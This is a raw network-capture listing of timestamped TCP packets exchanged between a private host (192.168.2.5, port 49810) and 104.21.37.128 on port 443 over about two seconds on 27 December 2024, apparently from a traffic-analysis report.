Dec 27, 2024 20:25:15.394866943 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.394906998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.424607038 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.424657106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.424756050 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.424768925 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.424779892 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.428313971 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.428368092 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.428383112 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.428389072 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.428436995 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.431386948 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.431427002 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.431479931 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.431484938 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.431505919 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.435178041 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.435226917 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.435275078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.435281038 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.435288906 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.481714010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.585926056 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.585972071 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.586013079 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.586019993 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.586045980 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.586059093 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.589819908 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.589889050 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.589901924 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.589966059 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.592732906 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.592773914 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.592808008 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.592817068 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.592844009 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.592854023 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.596539974 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.596596003 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.596605062 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.596625090 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.596659899 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.596668959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.626041889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.626087904 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.626152992 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.626163006 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.626195908 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.626216888 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.629117966 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.629178047 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.629189968 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.629204988 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.629235983 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.629251957 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.632822990 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.632863998 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.632886887 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.632893085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.632920027 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.632939100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.635843992 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.635904074 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.635914087 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.635926962 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.635961056 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.635972023 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.787061930 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.787174940 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.789480925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.789480925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.789488077 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.789547920 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.790245056 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.790292025 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.790335894 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.790340900 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.790371895 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.790390015 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.793354988 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.793401957 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.793433905 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.793442965 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.793473959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.793488026 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.797103882 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.797167063 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.797183990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.797189951 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.797230959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.827032089 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.827076912 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.827250004 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.827250004 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.827265978 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.827327967 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.830034971 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.830095053 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.830116034 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.830121994 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.830158949 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.833832979 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.833873987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.833909988 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.833915949 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.833944082 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.833954096 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.836822033 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.836864948 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.836901903 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.836908102 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.836936951 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.836960077 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.989727974 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.989778042 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.989835024 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.989856958 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.990004063 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.990004063 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.992820978 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.992862940 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.992902994 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.992908955 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.992940903 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.992954969 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.995981932 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.996027946 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.996058941 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.996068001 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.996097088 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.996110916 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.999083996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.999125004 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.999162912 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.999167919 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:15.999201059 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:15.999217987 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.028606892 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.028650999 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.028696060 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.028702974 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.028959990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.028959990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.031441927 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.031481981 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.031511068 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.031516075 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.031548023 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.031558037 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.035245895 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.035286903 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.035331011 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.035351992 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.035363913 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.035397053 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.038193941 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.038233995 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.038271904 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.038276911 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.038306952 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.038319111 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.189954996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.190000057 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.190022945 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.190030098 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.190069914 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.190085888 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.193267107 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.193326950 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.193327904 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.193353891 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.193386078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.193401098 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.196311951 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.196373940 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.196388960 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.196394920 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.196434021 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.199263096 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.199318886 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.199331045 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.199337006 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.199373007 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.199381113 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.229096889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.229141951 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.229197025 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.229204893 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.229238033 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.229249954 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.232110977 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.232151031 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.232182026 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.232187033 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.232219934 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.232229948 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.235812902 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.235856056 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.235893011 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.235898018 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.235925913 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.235938072 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.238871098 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.238912106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.238944054 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.238949060 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.238979101 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.238990068 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.391361952 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.391407967 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.391472101 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.391479015 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.391535044 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.394022942 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.394062996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.394109964 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.394114017 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.394151926 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.394169092 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.397564888 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.397605896 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.397653103 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.397659063 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.397702932 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.397727966 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.400661945 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.400703907 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.400752068 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.400758028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.400794983 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.400820017 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.430113077 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.430157900 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.430272102 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.430284023 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.430316925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.430341005 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.433650017 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.433664083 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.433753967 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.433759928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.433805943 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.436837912 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.436851025 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.436933041 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.436939955 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.436981916 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.439877033 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.439891100 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.439965010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.439971924 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.440021038 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.592622995 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.592638969 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.592730999 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.592739105 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.592802048 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.595247030 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.595261097 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.595340967 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.595346928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.595392942 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.598227024 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.598239899 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.598355055 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.598360062 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.598407030 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.602011919 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.602026939 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.602099895 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.602107048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.602158070 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.631598949 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.631614923 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.631727934 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.631737947 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.631793976 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.634742975 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.634757996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.634831905 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.634838104 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.634877920 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.638648987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.638664961 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.638736010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.638741970 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.638782024 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.641402960 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.641417980 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.641491890 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.641498089 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.641550064 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.794091940 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.794111967 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.794241905 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.794253111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.794305086 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.796504974 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.796542883 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.796581984 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.796591043 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.796634912 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.800229073 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.800244093 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.800317049 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.800323963 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.800370932 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.803297997 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.803333998 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.803373098 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.803380013 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.803407907 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.803433895 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.832941055 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.832957029 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.833055973 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.833067894 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.833116055 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.835982084 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.835995913 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.836069107 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.836075068 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.836123943 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.839747906 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.839761972 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.839855909 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.839863062 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.839904070 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.842700958 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.842715979 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.842792988 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.842798948 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.842849016 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.995346069 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.995366096 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.995471954 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.995481968 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.995532036 CET	49810	443	192.168.2.5	104.21.37.128
